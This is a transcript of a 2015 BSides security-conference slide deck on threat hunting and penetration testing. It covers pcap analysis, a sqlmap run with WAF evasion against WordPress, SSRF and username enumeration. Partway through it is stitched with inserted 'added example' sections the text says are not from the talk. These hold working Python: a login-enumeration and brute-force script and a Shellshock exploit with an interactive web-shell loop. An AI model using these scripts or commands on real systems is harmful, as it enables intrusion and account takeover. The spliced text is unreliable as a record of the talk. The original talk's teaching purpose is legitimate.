The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 
ethical Hack
ethical Hackethical Hack
ethical Hack
 
Wm4
Wm4Wm4
Wm4
 
Wm4
Wm4Wm4
Wm4
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
 
Monitorama 2015 Netflix Instance Analysis
Monitorama 2015 Netflix Instance AnalysisMonitorama 2015 Netflix Instance Analysis
Monitorama 2015 Netflix Instance Analysis
 
Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016
 
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchain
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
 
DEF CON 23 - Rickey Lawshae - lets talk about soap
DEF CON 23 - Rickey Lawshae - lets talk about soapDEF CON 23 - Rickey Lawshae - lets talk about soap
DEF CON 23 - Rickey Lawshae - lets talk about soap
 

BSides_Charm2015_Info sec hunters_gathers

  • 1. InfoSec Hunters and Gatherers By Primal Security 1
  • 2. Who Are We? • Primal Security: www.primalsecurity.net –Blog, Podcast, Tutorials •Our blog and tutorials documented a lot of our experience through OSCP/OSCE 2
  • 3. Zack Meyers @b3armunch • Continuous Monitoring Enthusiast • PrimalSec team member and Web Application Pentester GET • Any and all information I can EVER find on offensive techniques, tools and procedures. POST • I love hot sauce and will eat small meals periodically throughout the day aka “Zack Snacks” :) 3
  • 4. Andrew McNicol @PrimalSec • Security consultant • Co-Founder and one of the lead authors of Primal Security blog/podcast try: print ‘I enjoy writing error-free Python with Google and stackoverflow” except:pass • I spend my day abusing features in web applications - previous IR (pcap, malware) 4
  • 5. Quick Outline • Hunter/Gatherer • Defensive Use Cases: – Slicing and dicing pcap w/tcpdump + Dshell – Staying ahead of the game • Offensive Use Cases: – A pentest is not a scan – Pushing Past Walls – Abusing Contact Us/Feedback Features – Testing Remediation #ThinkDifferently • Making Your Own Tools - A quick look at Python 5
  • 6. We didn’t do it • We are not lawyers and/or giving you any legal advice. • We are not giving you permission or authorizing you in any way to do anything. • In fact don’t do anything ever... 6
  • 7. This talk • Too many people only leverage automated tool output to perform their job function • We plan to share some of our experience on going beyond automated tools. • Note: We do like automated tools – This is not a talk on bashing them! 7
  • 8. What is a Gatherer? • Someone who leverages automated tools: – Find vulnerabilities with scanners – Find interesting network traffic with an IDS 8
  • 9. What is a Hunter? • One who goes beyond automated tools to: – Find vulnerabilities missed by vulnerability scanners – Find evil in a sea of pcap – Writes their own tools 9
  • 10. Hunter Mindset • General Zod or John Wick mode #Focus #Confidence 10
  • 12. WARNING – PCAP Ahead 12
  • 13. Hunting with tcpdump • The ability to rip through pcap using tcpdump/Bash is a very useful skill • Profiling network activity can help you find what might be missed • We have a whole talk just on this topic: –www.primalsecurity.net/being-the-hunter- with-tcpdump 13
  • 14. Hunting with tcpdump Cont. • How do you deal with the output? – BPFs and Linux Utilities 14
  • 15. Hunting with tcpdump: Linux Utilities • grep / egrep - Powerful search utilities –Useful switches -i, -v • sort / uniq • awk - Awesome utility, lots of functionality - I use it to prints parts of a line –Useful switch -F 15
  • 16. Hunting with tcpdump: BPFs • Berkeley Packet Filter (BPFs) can filter for packets of interest: – host – net – port – src / dst – Boolean logic (and, or) – Protocol specific (tcp, udp, icmp, etc.) 16
  • 17. Useful Bash 1-liner for tcpdump • Useful 1 liner to read in multiple files at once with tcpdump: for i in `ls *.pcap`; do <tcpdump_comm>; done • This for loop can be useful for really any command you need to run through a loop 17
  • 18. Hunting with tcpdump: DNS • I see DNS as a treasure trove of information • You may find me getting dragon sickness over all the gold in DNS :) 18
  • 19. Hunting with tcpdump: DNS Cont. • Summarizing DNS with tcpdump/Bash: –for i in `ls *.pcap`; do tcpdump -ttttnnr $i udp and port 53; done | grep ‘ A? ‘ 19
  • 20. Hunting with tcpdump: DNS Cont. •Summarizing DNS with tcpdump/Bash: 20
  • 21. Hunting with tcpdump: DNS Cont. •Summarizing DNS with tcpdump/Bash: 21
  • 22. Hunting with tcpdump: DNS Cont. •Advanced DNS BPF: 22
  • 23. Hunting with tcpdump: DNS Cont. •Advanced DNS BPF: 23
  • 24. Hunting with tcpdump: Outbound Connections • Find the SYN every hour ☺ #NeedleInHaystack • Same approach as DNS, but we will focus on summarizing the dst IP in SYN packet 24
  • 25. Hunting with tcpdump: Outbound Connections Cont. • Quick BPF to key in on SYNs “tcp[13]=2” • Next we will use “awk” to grab just the dst IP 25
  • 26. Hunting with tcpdump: Outbound Connections Cont. • Now we can summarize the dst IP with “awk” and “sort/uniq” 26
  • 27. Hunting with tcpdump: Outbound Connections Cont. • Now to speed things up we can extract just the IP and then toss into a script to lookup network info (CIDR/Net Owner) 27
  • 28. Hunting with tcpdump: Outbound Connections Cont. • Now we can add in a bit of Python to lookup network info using Team Cymru’s Python whois module: 28
  • 29. Hunting with tcpdump: Outbound Connections Cont. •Advanced BPF Example: 29
  • 30. Hunting with Dshell • Dshell is a Python based network hunting tool • Takes stuff spread across several packets and puts relevant details on an evenly spaced line 30
  • 31. Hunting with Dshell Cont. • Dshell has several modules for hunting: – dns: matches up request/response – synrst: SYN followed by RST/ACK – netflow – web: parses HTTP request/response • Check out the blog post on SANS: – https://isc.sans.edu/diary/Another+Networ k+Forensic+Tool+for+the+Toolbox+- +Dshell/19277 31
  • 32. Be in the Know • As InfoSec professionals we all sit on a throne of vulnerability data and system versioning information that can ideally look overwhelming from a glance. • So adjust your approach to keep yourself alert… • Be the Continuous Monitoring Hunter and Gatherer for your firm through these techniques... 32
  • 33. Follow, Read, Apply, Repeat • Follow other info sec professionals via twitter for the latest news. • Read security blogs and rss feeds for information on the newest vulnerabilities/ exploits that are trending today. • Apply what you read and identify your firm's footprint if applicable (via vuln data or hunting with tools) or create a lab environment (VM) to test a recent exploit. • Repeat do this process again throughout the day when you can or have downtime. 33
  • 34. Some CM Examples • Any security professional can appreciate a heads up! - Knowing info on the next BIG SCARY VULN before management does…#Heartbleed #Shellshock #POODLE #GHOST • Even knowing something as simple as a software having an out of band patch, security bulletin or approaching EOL - (i.e Java SE v7 EOL by the end of this month April 2015) 34
  • 35. Spread Awareness • Sharing information and knowledge about threats as they emerge can not only help you, but more importantly your TEAM. • Reference blogs and the NIST NVD once a CVE is released to help track/ communicate amongst your team. 35
  • 37. Scans Ran Found Nothing…So Secure, Right? • Often the focus of an assessment is to run tools and get things “scanned”: – “Did you run your scans?” – “How many checks did it fail?” 37
  • 39. Pushing Past Walls •Hacking is all about massive amounts of failure and not giving up •The right mindset is critical to being successful 39
  • 41. Pushing Past Walls Cont. • Recent pentest we found a WordPress server •Could access login panel - So brute force is in! –Enumerate valid usernames via login error messages •Wpscan found some stuff to play with: –Avada Theme with Revslider –Paid Memberships Pro Path Traversal Vulnerability –Photo Gallery <= 1.2.7 - Unauthenticated SQL injection 41
  • 42. Pushing Past Walls: Attack Plans • Brute Force:Had a valid username - very slow ☹ • Paid Memberships Pro 1.7.14.2 Path Traversal: – Worked! Sweet LFI (Grabbed wp-config.php) – It was via a php readfile() so no code execution 42
  • 43. Pushing Past Walls: Attack Plans • Photo Gallery <= 1.2.7 - SQL injection • In lab: – Read up on the vulnerability – Replicated in lab – Tested it in lab environment and w00tw00t worked – On Assessment Server: – Needed to have a valid Gallery ID for the server – Attempted MSF module and failed ☹ – Dug through pcap, few requests in RSTs from the server…hmm potential WAF 43
  • 44. Pushing Past Walls: Attack Plans • Figured out how to replicate the finding on lab setup with sqlmap: • sqlmap -u “<target_URL>” -p “order_by” --random- agent --tamper=between --dbms=mysql --level=5 -- risk=3 – Sqlmap on the target site – Still blocked! – Added in “--delay=“ and figured out I needed a 4 second delay to not trigger the WAF 44
  • 45. So I am back to this again….. 45
  • 46. Pushing Past Walls: Attack Plans • Result? Took a long time, but (DB Enum, Table Enum, --dump wp_users): – Screen shot from lab setup: 46
  • 47. Pushing Past Walls • Was able to crack user hashes and authenticate to server and completely comprise the web app • Great win here, but lots of places I nearly stopped and had to push past to be successful • Much easier to give up 47
  • 48. Contact Us and Feedback Forms 48
  • 49. Example: SSRF open relay •Server Side Request Forgery (SSRF) vulnerabilities can make the web app your puppet: –Contact Us Forms –Feedback Forms –Forms to request external services: •tweets-grab.php 49
  • 50. Example: SSRF open relay Cont. • Another team gave this site a clean bill of health after a WebInspect scan + remediation • Automated tools weren’t really working too well (Automated tool said 30 days) • Started to manually test features with Burp as proxy and found SSRF open relay ☺ 50
  • 51. Example: SSRF open relay Cont. • Gave me the ability to send emails to anyone coming from anyone in the organization (#BeefHook) 51
• 52. Example: Vulns in Unlinked Content • SharePoint sites are guilty of this: you may see a default IIS page when visiting the FQDN, but after some Google Fu, Burp's Engagement Tools, etc. the picture changes • site:<FQDN> or inurl:<FQDN>, then narrow down with additional search operators: filetype:<extension> (maybe a .bak or .old), or -<term> to exclude results (kind of like grep -v) • You find a new source of unlinked directories and resources that establish a whole new attack surface!
• 53. Example: Vulns in Unlinked Content • Most automated tools only evaluate linked content • Enumerating the technology in use and requesting its default content gets lots of wins (default admin panels, vulnerable resources, etc.) – Google search "<technology> exploit" • Lots of vulns could be hanging out unlinked in the app
• 54. Username Enumeration • Differences in login error messages • Password reset feature? – Attempting to reset the web admin: "Which admin username did you want to reset?" • Metadata in documents on the site
• 55. Username Enumeration Cont. • In our experience web applications commonly don't have strong password complexity requirements – "password3", "p@ssword"… yes, they still work • Enumerated usernames, combined with no lockout and some wordlists = account compromise: – Deploy code, send emails, upload files, etc.
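Added example (not from the talk): the login-message technique from the two slides above as a script. It baselines the response for a username that certainly does not exist, flags every candidate whose response differs, and then runs a small wordlist against the confirmed usernames. The form field names, URL and the leaky messages in the constructed fake login are assumptions.

```python
"""Username enumeration from differing login responses, then a wordlist run on the hits."""
import urllib.error
import urllib.parse
import urllib.request


def http_login(url, username, password, timeout=10):
    """POST one login attempt and return (status, body). Field names are an assumption."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def fingerprint(status, body):
    """Collapse a response to what usually leaks: status code and body length."""
    return (status, len(body))


def enumerate_users(candidates, attempt, junk_user="zzz_no_such_user_7f3a"):
    """attempt(user, pw) -> (status, body). The baseline is the response for a user that does not
    exist; any candidate that produces a different fingerprint is reported as a valid username."""
    baseline = fingerprint(*attempt(junk_user, "wrongpassword!"))
    return [u for u in candidates if fingerprint(*attempt(u, "wrongpassword!")) != baseline]


def brute_force(users, wordlist, attempt, success):
    """success(status, body) -> bool. Returns {user: password} for every hit, first hit per user."""
    found = {}
    for user in users:
        for pw in wordlist:
            status, body = attempt(user, pw)
            if success(status, body):
                found[user] = pw
                break
    return found


# Constructed stand-in for a leaky login page so the script runs offline.
_FAKE_DB = {"admin": "password3", "zack": "p@ssword"}


def fake_login(user, pw):
    if user not in _FAKE_DB:
        return 200, "Unknown username"
    if _FAKE_DB[user] != pw:
        return 200, "Incorrect password for this account"
    return 302, "Welcome back, %s" % user


if __name__ == "__main__":
    # Against a real target swap fake_login for: lambda u, p: http_login("http://target/login", u, p)
    valid = enumerate_users(["root", "admin", "zack", "andrew"], fake_login)
    print("valid usernames:", valid)
    creds = brute_force(valid, ["123456", "p@ssword", "password3"], fake_login,
                        success=lambda status, body: status == 302)
    print("compromised:", creds)
```

Body length is a crude fingerprint: per-request CSRF tokens or timestamps change the length on every response, so in that case strip them before comparing, or compare the error message text instead. Response timing is another channel worth baselining the same way when the messages are identical.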
• 56. OSINT Example • Found an admin video on YouTube • Found the admin's GitHub, LinkedIn and Facebook • Found the admin's email in the README of the source code • Validated the username via the "Forgot my username" feature • Found additional connections to the admin who liked his post on Facebook and worked for the same organization: – Brute forced those accounts and gained access to the application • We have a whole talk on OSINT: www.primalsecurity.net/osint/
• 57. Scanner Takes Too Long • Not uncommon for an automated tool to say "Estimated time 34 days…"
• 58. Automated Tool Crashes App • Not uncommon for an automated tool to tip over a server • Throw an automated tool at a sensitive web application and you might see something like this:
• 59. Automated Tool Crashes App Cont. • Should still be noted in the report as a finding, since the Internet at large scans applications too • You should also be able to fall back on manual testing to ensure the other vulnerabilities still get enumerated
• 60. Testing Remediation Example • fileupload.php trusted the client-supplied MIME type; bypass it by changing the "Content-Type" of the file part in the request
• 61. Testing Remediation Example • Developer fixes it with additional server-side checks and names the file fileupload2.php • How would you go about testing this?
• 62. Testing Remediation Example Cont. • I saw my input pass to "fileupload2.php" • I thought "Hmm, I wonder if fileupload.php is still accessible…"
• 63. Making Your Own Tools
• 64. Learning a Scripting Language • I find it a necessary part of my day to day • Learning a scripting language isn't that hard • It's like starting a friction fire
• 65. Python • Python is my weapon of choice • This talk won't teach you how to write Python, but we plan to show some examples – We have a whole talk and tutorial on Python: • Talk: www.primalsecurity.net/introduction-to-python-for-security-professionals/ • Tutorial: www.primalsecurity.net/tutorials/python-tutorials/ • We suggest picking a small project and tackling it
• 66. Python Resources • Courses: – SecurityTube's Python Scripting Expert course – Google's free Python course – Codecademy's Python course • Books: – Violent Python by TJ O'Connor – Gray Hat Python and Black Hat Python by Justin Seitz
• 67. Python Modules • Python has a lot of built-in and 3rd party modules that do the heavy lifting for you • OS command: • whois lookup:
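The slide's two code screenshots did not survive extraction. As an added example, not the slide's own code, here are the two things it refers to with standard-library modules only: running an OS command through subprocess, and a whois lookup done as a raw query to a whois server over TCP/43 (the protocol in RFC 3912, where you send the query plus CRLF and read until the server closes). The sample whois text is constructed so the parser can be exercised offline.

```python
"""OS commands and whois lookups from Python with the standard library."""
import socket
import subprocess


def run_command(args):
    """Run an OS command without a shell (no injection via the argument list) and return stdout."""
    result = subprocess.run(args, capture_output=True, text=True, check=True)
    return result.stdout.strip()


def whois_query(domain, server="whois.iana.org", timeout=10):
    """Send '<domain>\\r\\n' to a whois server and read until it closes the connection."""
    with socket.create_connection((server, 43), timeout=timeout) as sock:
        sock.sendall((domain + "\r\n").encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def parse_whois(text):
    """Turn 'key: value' lines into a dict (first value wins); comment and blank lines are skipped."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("%", "#")):
            continue
        key, sep, value = line.partition(":")
        if sep:
            fields.setdefault(key.strip().lower(), value.strip())
    return fields


def whois(domain):
    """IANA replies with the TLD's authoritative whois server in a 'refer:' line; follow it once."""
    first = parse_whois(whois_query(domain))
    referral = first.get("refer")
    if referral:
        return parse_whois(whois_query(domain, server=referral))
    return first


# Constructed sample of an IANA-style reply, for an offline check of the parser.
SAMPLE_IANA = """% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org

refer:        whois.example-registry.test

domain:       NET
organisation: Example Registry Services
"""

if __name__ == "__main__":
    print(run_command(["uname", "-a"]))
    print(parse_whois(SAMPLE_IANA))
    # Live lookup (needs network): print(whois("primalsecurity.net"))
```

Note the list-form `subprocess.run([...])` with no `shell=True`: the moment a tool interpolates user or target data into a shell string, your scanner has its own command injection.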
• 68. Python Web Scanner • During our assessments we find it very useful to write custom scripts that automate interaction with web applications • Making web requests in Python is a very practical use case
• 69. Python Web Scanner Cont. • A basic web scanner example
• 70. More Advanced Web Scanner • PrimalSec <!-- Web Testing Framework -->
• 71. Python examples - Shellshock • In Corelan training at DerbyCon… sleep deprived and overdosed on Red Bull -> enter Shellshock – Had to spin up a tool to check for Shellshock
• 72. Python - Shellshock Cont. • Below is a quick Proof of Concept (PoC) for Shellshock
• 73. Python - Shellshock Cont. • Example output: this illustrates how to automate an RCE so it feels like a web shell
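The PoC and its output on these two slides are screenshots that did not survive extraction. As an added example, not the talk's script, here is a Shellshock (CVE-2014-6271) checker of the same shape: it sends the crafted function-definition string in the User-Agent header of a request to a CGI endpoint, wraps the command's output in a marker so it can be cut out of the HTML reliably, and then loops commands through that request so it feels like a web shell. The target URL is a command-line argument and the marker string is an assumption.

```python
"""Shellshock check and command loop over a CGI endpoint (added example)."""
import sys
import urllib.error
import urllib.request

MARKER = "PRIMALSEC_SHOCK_"  # assumed; any string unlikely to appear in a normal page


def shellshock_header(command, marker=MARKER):
    """A vulnerable bash parses an environment variable starting with '() {' as a function
    definition and runs whatever follows the closing brace. The CGI server exports request
    headers as environment variables, so the User-Agent reaches bash. The leading 'echo'
    terminates the CGI response headers so our output lands in the body."""
    return "() { :; }; echo; echo %s; %s; echo %s" % (marker, command, marker)


def extract_output(body, marker=MARKER):
    """Text between the two markers, or None if the payload did not execute."""
    start = body.find(marker)
    if start == -1:
        return None
    start += len(marker)
    end = body.find(marker, start)
    if end == -1:
        return None
    return body[start:end].strip()


def run_via_shellshock(url, command, timeout=10):
    req = urllib.request.Request(url, headers={"User-Agent": shellshock_header(command)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            body = r.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        body = e.read().decode(errors="replace")
    return extract_output(body)


def is_vulnerable(url):
    """True only when our command actually ran; a page that merely echoes the header back
    does not pass, because the text between the markers would be the payload, not 'vulnerable'."""
    return run_via_shellshock(url, "echo vulnerable") == "vulnerable"


def web_shell(url):
    """The 'feels like a web shell' loop from the slide: one HTTP request per command."""
    while True:
        cmd = input("shellshock> ").strip()
        if cmd in ("exit", "quit"):
            break
        print(run_via_shellshock(url, cmd) or "(no output: not vulnerable or command printed nothing)")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: %s http://target/cgi-bin/status.cgi" % sys.argv[0])
    target = sys.argv[1]
    if is_vulnerable(target):
        print("[+] %s looks vulnerable" % target)
        web_shell(target)
    else:
        print("[-] no Shellshock response from %s" % target)
```

Only stdout comes back this way; redirect stderr (`2>&1`) in the command if you need it, and expect the CGI server's own timeout to cut long-running commands short.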
• 74. Writing Scripts for the Assessment Report • Writing a script to demonstrate a vulnerability for the report can help land the impact – LFI/RFI -> shell – Automating an RCE into a web shell capability – Automating an SSRF to show its potential impact
• 75. Useful Training • Offensive Security: OSCP/OSCE • eLearnSecurity • SANS • Vulnhub.com • We have a talk covering this in more depth: – www.primalsecurity.net/how-to-be-an-infosec-geek/
• 76. In Summary • We hope this talk inspired more people to: – Be a Hunter and a Gatherer – Pick up a scripting language or Bash Kung Fu #StartTheFire • Hopefully you can go out tomorrow and find bad guys or vulnerabilities that may have been missed for days, months, or even years!
• 77. Contact Us • Primal Security – Website: www.primalsecurity.net – Email: andrew@primalsecurity.net – Twitter: @PrimalSec, @b3armunch